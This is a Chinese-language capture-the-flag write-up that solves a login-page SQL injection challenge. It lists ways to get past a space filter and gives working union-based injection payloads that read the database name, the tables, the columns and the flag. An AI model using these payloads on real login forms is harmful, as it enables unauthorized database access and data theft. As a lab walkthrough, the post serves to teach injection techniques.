题目分析
题目是一个登陆页面,猜测可能是sql注入类的题目
在这里插入图片描述
尝试一下万能密码
username=admin'/**/or/**/1=1#&password=1
在这里插入图片描述
发现有过滤,要找出来是过滤了哪个字符,依次输入验证,发现是过滤了空格
那么就要绕过空格,有以下几种方法
- /**/
- ()
- 回车(url编码中的%0a)
- `(tap键上面的按钮)
- tap
- 两个空格
详细见下面这篇文章https://blog.csdn.net/weixin_39945475/article/details/109903954
在这里采取/**/代替空格绕过
sql注入流程
爆库
username=admin'/**/union/**/select/**/1,database(),3#&password=1
得到web2数据库
爆表
username=admin'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1
得到 flag user 数据表
爆字段
username=admin'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=1
得到flag字段
爆字段值
username=admin'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/flag#&password=1
得到flag值
在这里插入图片描述